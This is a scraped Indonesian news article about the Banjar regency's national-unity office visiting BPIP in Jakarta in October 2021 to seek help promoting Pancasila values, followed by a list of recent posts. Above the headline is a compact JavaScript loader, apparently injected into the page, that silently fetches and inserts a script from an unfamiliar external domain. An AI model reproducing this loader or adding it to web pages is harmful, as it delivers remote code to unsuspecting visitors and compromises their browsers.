(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Banjar

Bakesbangpol Banjar Kunjungan ke BPIP


KANALKALIMANTAN.COM, MARTAPURA – Pemerintah Kabupaten (Pemkab) Banjar melakukan kunjungan kerja ke kantor Badan Pembinaan Ideologi Pancasila (BPIP) di Jakarta, Jumat (15/10/2021).

Kepala Badan Kesatuan Bangsa dan Politik (Bakesbangpol) Kabupaten Banjar Aslam SSos MAP mengakui, anggaran yang minim untuk melakukan sosialisasi tentang wawasan kebangsaan dan Pancasila sangat terbatas.

“Kami mohon bimbingan dan arahan dari BPIP, karena terus terang dari kami sendiri, berkaitan dengan ketahanan ideologi terutama dalam anggaran minim,” ujarnya.

Kekhawatiran dengan doktrin-doktrin yang memperpecah belah bahkan merusak ideologi Pancasila, perlu ada tindakan pencegahan sejak dini terutama pada generasi muda atau milenial.

 

 

“Meskipun kami sudah ada forum-forum dan sudah melakukan pendekatan-pendekatan, namun belum optimal,” ujar Aslam.

Kepala BPIP, Prof Drs KH Yudian Wahyudi MA PhD menyambut baik kedatangan Pemerintah Kabupaten Banjar karena telah menjemput bola untuk pembumian Pancasila.

BPIP telah memiliki 5 kedeputian dengan tugas pokok dan fungsi yang berbeda dalam sosialisasi dan internalisasi nilai-nilai Pancasila.

Wakil Kepala BPIP Prof Hariyono MPd menegaskan peran pemerintah daerah baik eksekutif dan legislatif sangat strategis dalam pembumian Pancasila.

Deputi Hubungan Antar Lembaga, Sosialisasi, Komunikasi dan Jaringan Ir Prakoso MM mengakui untuk pembinaan ideologi Pancasila tidak bisa sendiri maka harus semua terlibat baik kementerian, lembaga dan pemerintah daerah.

“Sosialisasi dan internalisasi ini tidak cukup kepada tidak hanya kepada PAUD sampai perguruan tinggi, tetapi semua masyarakat Indonesia termasuk nelayan, petani, pedagang dan lain-lainnya harus tersentuh,” paparnya.

Selain itu BPIP telah memiliki Jejaring Panca Mandala yang ada di beberapa Daerah untuk membantu BPIP dalam tugas pokok dan fungsinya. “Kami juga mendorong konten-konten di daerah, karena kami menggali mutiara mutiara Pancasila,” jelasnya. (kanalkalimantan.com/rls)

Reporter : rls
Editor : kk


Al Ghifari

Recent Posts

Lepas Keberangkatan 320 Calon Haji, Ini Pesan Bupati Banjar

KANALKALIMANTAN.COM, MARTAPURA - Bagian dalam dan luar halaman Mahligai Sultan Adam di Jalan A Yani… Read More

1 jam ago

Hari Ini Masuk Asrama Haji, Kloter 1 Embarkasi Banjarmasin Berangkat Minggu

KANALKALIMANTAN.COM, BANJARBARU - Jelang kedatangan rombongan jemaah Haji Embarkasi Banjarmasin Kloter 1, Sabtu (11/5/2024), Petugas… Read More

2 jam ago

Paman Birin Trophy VII 2024 Digelar 15 Hari di Murdjani

KANALKALIMANTAN.COM, BANJARBARU - Gubernur Kalimantan Selatan H Sahbirin Noor membuka secara resmi Paman Birin Trophy… Read More

3 jam ago

Karst Sangkulirang-Mangkalihat dan Delta Mahakam, Bentang Alam yang Terancam Eksploitasi

KANALKALIMANTAN.COM, SAMARINDA - Akademisi Teknik Geologi Universitas Muhammadiyah Kalimantan Timur (UMKT) Syamsidar Sutan Malim Polawan… Read More

4 jam ago

Kunker DPRD Kapuas Perkaya Referensi Raperda Bangunan Gedung

KANALKALIMANTAN.COM, KUALA KAPUAS – Panitia Khusus (Pansus) I Dewan Perwakilan Rakyat Daerah (DPRD) Kabupaten Kapuas… Read More

17 jam ago

Haul Dua Wali Allah di Cempaka yang Sangat Dermawan dan Hidup Sederhana

KANALKALIMANTAN.COM, BANJARBARU - Haul Syarifah Badrun Al Qadiri Al Hasani bin Sayyid Yusuf Al-Qadiri Al-Hasani… Read More

19 jam ago

This website uses cookies.